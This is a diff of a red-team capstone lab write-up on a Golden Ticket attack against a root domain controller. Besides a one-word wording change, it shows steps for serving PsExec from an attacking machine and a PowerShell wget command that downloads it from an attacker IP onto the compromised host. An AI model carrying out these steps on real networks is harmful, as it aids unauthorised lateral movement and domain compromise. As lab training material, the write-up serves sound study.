kairosart/Red-Team-Capstone-Challenge/COMPROMISE THE ROOTDC/Golden Ticket Attack with mimikatz.md

 - Unzip the file.
 - Start a python http server on you attacking machine in the directory where you unzipped pstools.
-- Get psexec.exe from the shell on the ROOTCD machine.
+- Get psexec.exe from the powershell on the ROOTCD machine.
 	PS C:\Users\Administrator> `wget http://10.50.110.16:8000/PsExec.exe -o psexec.exe`

 ### PowerShell session in ROOTDC